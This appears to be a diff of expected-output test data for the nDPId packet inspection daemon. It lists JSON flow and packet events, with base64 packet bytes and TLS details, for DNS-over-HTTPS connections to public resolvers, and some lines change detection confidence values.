+00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946739304474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAAuA8Y9AADUG9KG5X9oqCgAAAQG7xbYrbSbwao0RxFAQAfVfuQAAFgMDAHoCAAB2AwMcSuw\/xeEh9B9zohSBYXmLCSdYelc0PZguMzAQLdc5lyDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25xMCAAAuACsAAgMEADMAJAAdACA9LiT1RQf61DUAcNgmrd9PJwh2JRIEeJ2AayVwYZe0VRQDAwABARcDAwAkpkFL6pYrY48v\/7oiAzlOAXfNYnXJT5\/VQ9ye3Jhdgfb\/qFcIFwMDDINDI+OvHUF+FRNUcqHGAtixa5OM3ESWY04brG7N5Xjztm8RaH\/MawsGpkLkwKimhVGQ6ciJhhX175QbHhfhLL45mnkevxxrQGot9ty+fzwVg7GUUCbrsUr32l6TD4OY9EXQQSyuoBvDePneEphgFWs2uB\/zEFQxJzZvf194T3VRrMXZftbpf\/YmEhwWBzhFxCXz7FBI47mE4BFAjuyUMEWUzwiwE55sybcBJQIrcz91caVnRcYmA1Wi1qK5uHVbVaqkF1jIcRZS6+N+xmFq9MBtbs1TttpF6z36PG19i1g1CIx8xl4wpaYvqDA7QOoSL5x3PMqBtb0k4c3Q\/zEwDdawR+TYy7hNCaHkQ1sAWum3cmhRVUAXu9xkbB0O3nyNloM3\/1BpKJAhKkuU\/V2kkZGB6Ql\/kS7sAxcWh603OAJFGoXqcwc2spjFNCK4ea9Hs8PmACV\/UTaJ7lrlVw2HKBfFrLZE4S2HECqocWhjyVs89\/VZtJDOJu7pXlvP6vYnAZ+sKU9FZHgQ29hFtZTpOUnFJKyIZ7qR3IrvVPATpVytUzMEEVKArnVXT6TYqqci\/q+Ob0fbpe70cziyO7QaX7DT+VhBEhzijRbBVrFLadSpyh0XwKqeuShTd5lBEg4jq+0xz6QU3AR+JKO5yFNIu3wqn66JM48D8VfHh\/P6zoK25bt+h0uyMx2Tdvz0o8sXcXOlNbkjxJTj+b3L48sroz1OixQLEwkGWR0YALDiDYZDaGEdLMJeKpDENsvWGjQzbcLGtxojF3IPZE5plenMHHam99lQcz7tOMhTuD0tu9K1ubLwoOk+K9ZSx+jQ\/y8OgEHvmzPhQqCD3uYFzKXprY15BXYSgVl4JkFtCc53KhrIqQpwfu8AGb8d7NaM+YwOO8C5+0rvVtZQVjay20f9c8RH+m7E+z6+gghCL2zO42Qf0EGAmfsmAKXMp6WNxCrd7mkU+MupYWwFGBmLvHH3Vl5XVJZL0bTZyhceC5c2NC8KJ3G3fmI41pUyCIqBiCF4naOVVb20hz4J7t7d4+3vNMlh9pkutkDtBUG\/sopbYKTD6kxhRU0nbMYNcJYsotavdtxk+5ricax8dlXTEQUyVGuU7VzQro6ZTS2J\/N+Dqw0JjCzhzZM4Iy+Zigsyz452Mxwn4H+POZW9AEa8UJIqsMXNYUOgxqdRZORU8gjSaaYtyhn4ZgPLYzJWev+UYEVbkQQlIs0qMsnDALKCKs\/vPLbMaZzLaWAeXOQBcQn6dRdSl1OHdjVYou9K0wNLFmi57+vod9Ufwp9xSCvh3ThgMiLBs9ntZ+DKnnpNK7K++8wDuLBmnbcYEnUZrZqGa8EXM5oLFPSizN87UN+K45Q\/S\/mtl3uxWe3MQN2DDd0vZIT\/pM6xA4vmgKQKhOGh1G\/LsJ4bGVvyfPbVWvvPsPMrkNeqwnVRFRE+JcuPLjNn3DyJRPv6SImnNR3F3p3NDu+U\/bZYbpfAqdtebmwkI6E92\/4EaRwnMS8jUU+nm4J3KxRiQRAHf2ic3MpHIJFU1alZ3UsqHJ6ixFmoZGKJNMub9RVwhhoMDob7lsWG2+BH4aWefcCL1wBXs4NIWJsY2Ws638ztVCok6ObVcpsMJe2l2ribLtt6uLyB1eEKfooGXoxgtbiHn8UI8BDgLRXpCnA7qK7wNCPv\/hXV\/5qObuA7HW\/C2qkSIpV\/R39i9wwVQ1ug1QIQz\/Ivm\/r6WLd0npdZrGVu5GBOJgUSRjnZQS5nqzdQ7xc5efsR5ICHi2XulsD+Zl3WQXVxYViEQMZNQRJCVpPIcx8YSgUINm5M6giDWQvYaHGMiifN+4pLOGo7UDtXSoYcIPou4kTo7mt5yFzAggk8EG0TmExkKN5uy8guvzoGiu3UmP1ayFSZA5TF4Hxgcg+2NpMUwTAvYDD0pW884S8fOW9HXDNECKzwG\/oVVn5NMUQqNCBUKpIkrq4caPrR60LP1G1fKKVz2Mf14oxUS6BYWLwcRFuY6LigPfz3Ch2bE\/jL+itDz+psExENk+g1PfaK4go+YhsmYCnhhZtTocVAIm+qVANsaIE47+Mr\/3qaOf1rseYxdMsxv04vxWH70UAraH7Y4AGe1DhKm55YgPg2VNLv+h443L3JtfuQRH1c2k3TEXhdwCAcDQH9W699eTwV8ntiQTxjZssTXuxQRFgjLr00HeNPNF7n2H9VgT8LsXQAt4\/i29eoQanjq3bUca84pwERHpxJCf8pS1a1KaFzMXvwUcJQOHW0Q\/N1pQGzvCpgH08Dx9GmHQ9KyzJ\/25WSu25QUZfal6F7L79g8iREwvmDUfy2lEv7mGnvWdhk02quVGsRpK9JEZQWo1rmsoDlNw4F7rXwD7R+U4RUfRyKkcbXPHiTg6YeMzcydsycniM9RaMjPPob9n1bk26ufx+9SlvlwwzqBTbOelsik5jIa525vbi5OIQxSrn0plookRa9xUJNwJ0omdn9j\/AW9IsSa86jM4scUrSMFbeKS4NfQDG9J4VYxzdoR7UNco77sa40\/zPWSa52BjRajNWVVhLj2o4JJQ1TdUu1\/Y89xmSzFKfGWeLSDj5A40mFHXGu4ywpzLC8Nndnau8G5aFKzcr\/e\/FYXUsoYZybTLRRgFBh9CldD2TTFeVueuq98o4ZVu+q1YYgsJKBwBBdV7ZQvj9\/cuG60fpzaNEiWJubkXSKKJvv74KXiPSXeDhQYLSS52OcrIzafNPniFrdcohvXMGEBoTJqcVbFo3+5iC13wm4mlmo+quy\/l2iSqCs4wxDhhSbLnO3Mj4Jo+xpM+BWcGCqCQkZM3XVKq9YiLnmUpBqToMdPk8pxszpPKZj1LhkprcBdvtCOBdOnwV08YRjPbT04P1DuRJXM7LDfWyxwk\/Is8GGMA1w6+\/RlaDUJ4QA8kKf62dGdodCfjoiQVkcxdXgak+xv+ho1izHEaG3Cxi3\/0JNNkwi2GYgruxc5fmKOdC4sqtkxC8j7I10mTh3+xdhudUBx0Sfr8yXq66S2KI88KrN3whtG4+sfGtAkvxG1DDMgti4zkfemFnlOATAqP5VRZM6U99yi4VhRBfczJTw1gBFetM1BkbvErs0YQl2nnzhNtTGtufXl2uHH4oKan\/xnak8wRRzvD04JQK431fn3TEvjjqMfQgcgW2JNC7Jyw7AYjY5nB5jUcAvogHpO11F1M9vRMop+cLQefP6yxy73IHNujTUtW4L99fDdjHVHLSrb7JdVLoGFBt3fFHLJFZwGyi73KaVuA8iLogqAdT6WIlJVQpMEOX0IGn7EhGzmKBzxPYnYlqqEBMEmrbIy10AsTQseVjaAzuWns\/HCPxtq5uB5ayh6r0SQlamctp8CNeSGkejLyD9InFUv\/cN6jEeAPw9ln90Uo+NcJcsUJLeRD+0uBhQVWKlzlgFrsdNHfyZgldWogT0yc5biAQ0YsfjTotPSED4mJ044\/CPZYxO\/WG1WatWJcgbBPZpTJOczqp0KaqRJnQpbibu0vaCcUf\/KqPXTh9mQWbhQvkie6BJSQGOWuxP4jMOKd9ZpnBr0kUhcDeMAPaBISZnWKXpcStlkCGJnAAKL5CAgF\/30XUkXB1LxIrTS74Ar8WfurKCvwBWG\/WZugVENhYI47kxJo12a6YH"} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"thread_ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"thread_ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 01589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946739304474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":892,"pkt_l4_len":858,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAANu8ZFAADUG\/LG5X9oqCgAAAQG7xbYrbTJIao0RxFAYAfWPbQAAW0wo1H0j139pBXgBmTX+NlnQSaFEq5K3Pk3KVeGnXpOOLq4X08kQBuG8lGioiVe9QPOeM1XWvGxPlasRKFYrXBH86PGVaXAalDOEWJlV3PHRUUevw5fI6G+9XzuHkGZKTzPpIIOZ3iAzfHnVG3aTpqTBf7xHcc9kM1a8UHbmE4vJrXG9wa2HwWF2bcpsRjUYBUQxiid3MXG7FbSTEXHjqgO4LQdR6Xrrbq+Co3CdY49hyuqnRUiglv3ZkZvp\/BcnFskV9iJiOLBUK+jpAhnIdIbviFi78T5PQD4Tbyt8STzKJ4\/mkCRReunmywmmxKyYx8ErZcAkoKDR9IOJ3LCf8I8uzSUCcTKeSSnHS6ASYLDpWersQuLDgg3Is5Hb+2kMH37wQnKetidHgJqxmhLBaw+NX16ETkRc5vqPLeAmNQjzUjFZW029RGYPrEM\/M2aIcKp372plYpuhFsySXWIydCD9tqNCwZyquQ9nS3XV\/M4rQP8eJtxF8c+LbyHgf4cpoHUgBE4Qg\/rQ8QPjUfA1pwRPb\/2owpEEJi4RutXWP+JydB0D0ebOUJIyGUMSTIpJcFH2AKhLGUYE6NfckNeCzln4nEp2+qOXsbfMejtOZFyyhHVzHpRSbGA51CkajxcDAwEZGvKJBQnU\/r0Z9hIPhFlH3EC+7xZqS+s7+uQ2E96CDW5iU++SeFvwmMtUyG5rZZUMcBGpLzGamrlpIcWB85XVCU4gt4ssg9\/BdLmFwKiGqbmqVBGWt\/8gKtXdyHqS9eDrvNFNLvTrsxnC0XEzuTedB4Vu4WIaC7MUadYnyNgpkYSxjxFL6J71Xhm+92aoteroJN4zzFxDDd8rAkDnu1z+ZiBNnpB\/Gl8e1OMkCP6vsWHqZoCX9H9vn8tgHDIFyxXWqZDdxctsoUH7QrryxeYlvn1njblpv3w6tKj8ghJZAtQ3ko6UuvntUQvQpT48C+AbzDC+CMGpscAjbO2LKlP9fB1a9O37Dse31zOmm1FlQiiQCvlL1EpsgdEXAwMARSV8NSHQ2Cma7zLl9Np9i8ttiytzR2iGli71aKFmLcmNdXIXIfvH2D8Tx5IjanqSAuAMgykIOqh1u3rHE4swCwSQXoiMxQ=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946739304846,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739304846,"pkt":"REREREREZmZmZmZmCABFAAFKCqJAAL0GKn8KAAABM56TMtqaAbsV\/EiYhf03fVAYAfaIyQAAFgMBAR0BAAEZAwMDM0zFcZBVaq8jarHhMnn706tDCSlU6qIcSdmbVQbksCDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUcmVzb2x2ZXItZXUubGVsdXguZmkABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgp73dM21LptFd0ThW7be4\/uwlUqgVJQtqqMQYrFbmEGQ="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946739304885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3185,"pkt_l4_len":3151,"thread_ts_msec":946739304885,"pkt":"ZmZmZmZmRERERERECABFAAxjgA1AADcGL\/sznpMyCgAAAQG72pqF\/Td9FfxJulAYAfWT4gAAFgMDAHoCAAB2AwOQkeJmPgfI+2\/Nb2YFPwnrh6xqnBenx5u8q1ZnyWqFbyDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76BMBAAAuACsAAgMEADMAJAAdACAildRAk\/Ii9q568Shy0jK1lY4Sb1nfErCeFDdP5ao6KBQDAwABARcDAwAkQtxzjO6Y1fKC\/+pxVLm\/ix+V3OPJ68RUn+6KLdAjN0rm7jqVFwMDCjCAB4dDMRsvk08LXpiehq\/g9vbt8WAZZyX0IwUW7zm2s2JxksqGXN7MA4aQXMsXbea79jo4WvO3p6dz8ckR6\/GSVEFX2o1gGE3SmFE8bI1yIk7FWs3aYgxYwqLKQEvbN1ogdjJ6GVf+z5kiMwtt12G5tdTf7rSfZ3NH6Yk4oM8Elpl9VtGpp2o0FPfY8QB0bMd4GPEVRd4k3sqTgevSs5A\/CC4vXXDNw8uBoNAhPcBJ041jkXgJVSYm9QwFsJI4LdQTSOvpWGu8g3Q7\/FqYiPFofKEmMJ\/qdjv4rC472QK9MBOUQREh1M+X1zwZya0Ac0YwCKyp0B6QV8x8ZfPc4YWcPVw\/CzcsYjigSbp5JV0L4gyAue9Gh6S3YYS9bSWcQ6OYfhcUgIVrottiHisZ3rFZLnhHY2SXkUzy2eOnD3Qi87\/nZ2OjGdHVYvM8Yu4DBGax+k0RD3dyn9+WKeU6QKdkf0bt\/mxpZ+gCW+joqGHWhH8T8mliVYu97Vp1QkdwgpRB7hXYN0Y6CGFsBPw4pzAHjVBFBgDGgx3FLp+jHtYGS4QJXS1JHRsP\/ek1Bjr6PmHXQaaRrJ7LWjgQKI7Gha0EZqsq38SOF+eicMwDFpzc3B+5eNIjmjJW4NSel0FytKTt9ojc0NWkn0EYaG0EgY6+6x2nvzg5YX9tM13wZT\/oz2Ot9pPHCaabuHca2dbfesbpNetZkot4ox97XYVrqgngmst1PfSQmtM98M5ptnPmd\/sO4Q2zmY5zCyE4gqZJ\/jBMttfXco2\/5avcH7mX5ejSI27aNnLJexzSKXQ+JaOKITzvIhr9MApYef8a6mxmBG7KvaOHtWpBt2xvsdwkyGKaTSFivERAQJ3qVVpBnDVBNegKy8yEp45YgbraKILphly37eCzmeR8+BDQHM0\/olAhROBUZh\/RONZXvUkl5SKTRjHC2xvJNaeZYZ+hmdzytY6JxtjOWIkXJWGOQ1NLnp8ApIWyE\/uNNjzCwSksu7oipiMjp9\/TYKv3dTCD+5Ol7BQVVV99RWf0LzZ8iQzJsQx4OWgFzyT+Rx7ZVNnTGOrqRbAycjVipQHP7zlio12QWc9UNzJCxesOye7ivdDzyOxpzywnD3v8hSp\/9zPmf\/3ENHJgy8O34UUO06MOahgiokayYgWdjmVbemjxT1TryYu0gDna\/E6EV3qm9EmJk3uwiz6F8MD8T978R+EclF8jScCvS+0rc0myMoeeGSKvHZ59\/bY\/8uMlpK\/glxn4tf2FrEjMiwTYfD\/iCofxemvMkvC\/JJfgLtIuT4eRwYnzHY6tx9RKYdE3USzn4\/mm5qo5iJNIvjNV0kDlflg2at\/H0LoUPuAQDzKEIijJENcZ6pth1tAfPuzZbqzQybao7+N7tXszvfJs6XQ8U0IN8EKUruqqe63LmjAuODDmoGi5l1XKUHloz2N6Z0c6GOIMVwe3VD3oKEzis5\/IqukPTBIlPi3wM9hPvIjDsgqHeQuZwd0P2uGkmxxX+CQ\/eHLZcMkC6yXGIsoms\/DqqMmKImF+\/kg3KVbsOWynlp+qs+GRnuEe5Gwcck3bNanvNfRO2hnDlR3xxWpDeCDtY554dnKSdrEsmz56E3HZY7CS4xffa2qaRU9o8FE6oWceQ2YomJuE\/bMT3knxqniPrzl1K3GkigMh9J1i47zylUFJIasxWeeT4rnsrPdwO5pPpDZPDAhZZKqamf0Xxf7UyzOur5bQ0RGdSbDmjCGZUxwrcQgCzOocJ07C3y9f5\/cPHLy4Hcpi9nKHy5+zMgLxDuHh45d7g5aX2opBYeDFdZVkS35fhN\/VA5YDY3hjQkRRPMbthZpOOEiiUTiyQGuttf7SmNH1qqd0+P4R98lk6wmtu\/RYPzzoAOrY33Oweyfv45FrUJjxFb3dkB2JJBL+a3b7QXiEHk+jfi2DFJC8R1nDmEiD7lG0zp+GgCp2hMKrzTinc3jq7XrvSXgjRArW5vMll4UVtkgCZOG8JOPCJ+1InS6ZkzsHBlVE1ulhcQ6O07QOIetMX\/TQcpOws1Y3zI6xlDo7QN9RXjghTw1OQy\/e7csIpoqCDP+zQIn4uVNd9knXoZalNv0Vl+aMYpSUZU7SqXuPd5TrgUjyDCp5uSeJ7PvFxTrvq2m\/J4PCA00dz61blph4TnR5jqkjnWkPCWysgjmFP6jSXDVhi7OEYKJ3O5rj9s1KlWrTAKqEQ1WqkKpYs5zhjZX8C2jJXc7kR7CLzfiUXF\/NgCKD1oPTUZ3B8\/5yhnRignY4ZXMdGmmpuO\/YtIw9z3hTG2mvGzyDH+lTissPE7qvJQZpSJa3YSyfqgptZgRRY3rqQwM1Uan0WZB\/VyeZi71E8HGjmCdytjr1tbuT47siLcnpw\/tnXbVcW0DRQa0UluCuUeRWsFfgTuUhjuWHPeilVqW8TKVGxmd00ikgPoQa60hulHvmRZ5KO6vzi71RXX6dL\/wcA9t7hqc08oZMCG7pFOGbkwZ0H2Ou1cGKyFuTh2P28nKV1VsXeJy03j0rMepvwRePH7BjQM109D5zTvZ+x9U7LeeU5p\/97XLGVSvHyU6QoAkvI7FvvpHkTyoqhk2wuau1Ks3W6ziSuG5ItHrlZeoz2vdhzoVB+PdecdxLzV339b9A3nHa+rng\/3RfrU7m\/xV1uGOltE\/q6T8zbMwllfgMWQHWJtalokkS691O3vXWaxSb0GH3Eukn2GTLqT7xyn8hsg3I5F5pOCMspm6GHKCedNXQt\/rOrbG+70oNkLEiqOTucHrzdm7u3q9vZm5H7InHwwhmYB9o+wmMx9CpSsan17Eu6kQzONsC+k776iKm10F9TFCFRzcFvoSkJVRCogWUna5X6unZPh90yhZj+joK9OmDYl3uGf3cxeeYhuWr7BFipgMV88P5BfhbMuQJTiRkmE2tdVLKXiJJMT3RIuLttxViwKIZxqrsBPVZWuFgeoB\/tNKx1MPoFMSkd6Ady\/JPiKCd\/Lo+LSa+EGciXu3JhsD37LOO\/iaE1hxwYGWesFtcRBD82I4gt\/VZ4IZMSaNKHgm65E6lCcq41BJ\/gbuCDCFJ47l5UE8QhYSOHmp5J9j5vA1FjZFm5Iv6VRZaegnWKKRCmp+e5pBYWdf4T92iFA3wkmAojnbzcZPXM1FL7vahyaLx6fEfTzbYntPyfIJ2l5KJE855FQl1WRsib7X80Yvtknk5W4cHEv1yr1kjUU2CGJ8WMhJhi5rps9ncDKvd4PP0dTrH0ia8H78o1K4OYwHp0nPI0tpDBJqSO906qPhy7pON78NLR8NLi7ebyinTbjqYrIeAPW0BcPQXfo+ePTRQEGlW7G5LCAYlQCvO5j\/LMgF9c3iJwt3nUbOE+eqHvK0\/PHJmQK+ijLfXFLdBd6NBQSn3sHF\/qzgQRE5VwfSRmK55bFmg0PCiTnhGTWzfK0OvOvyyAAiwvXCaBV+gFnzKnwwQ+4ebBmLMgQpqYGGOrzwhV7P+RvbAFwMDARmYqpARsWX06T7\/aIqUa3gqpszdt6QdkNXpjrjP\/CtX9C+2AHbAmlDaq+eynMum8sDVzFoKFvQfGpt91s0+c4BcfaWSQDicP6abNOaMq+Hp75lMfIATEOyO9cUpGtsxdjbO98fR3ligfvynTicYTBBKOabjGzsvGqpIQNsc6yP7ec1DM5IvytEF3WMD\/BSWfSyCMBkPc77J1iCDteQqYtaAe0whPDVMG6GGDORujY8TM3L19IZL3YvYjw7AjSCmeKp+dThVSFL7D\/ks2Bt12v6Pc4J\/bL1kxAzO4vYx1vazs5rxcAfFBrI00UuE4UKrW1AuFrQrWAmy8gFVgJ7l+nCzCeDoyrV14OgMNuqUXIpirZiejq2fhnoXshcDAwA1MiDkD+m6EfUtBdx\/Pyl0ehgKaB76+ayZoBt6uEP7tnUDn+hUUsmcN7NZ1IZhFxhyx2uKd6w="} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"thread_ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"thread_ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946739304887,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739304887,"pkt":"REREREREZmZmZmZmCABFAABoCqRAAL0GK18KAAABM56TMtqaAbsV\/Em6hf1DuFAYAfWH5wAAFAMDAAEBFwMDADVGrMk33Jx9u4V9oT8gk9T3N9siooKVMszOs96zlvjMst5cKF\/6mDE\/X3tfb1uyKq+NLUpVEQ=="} 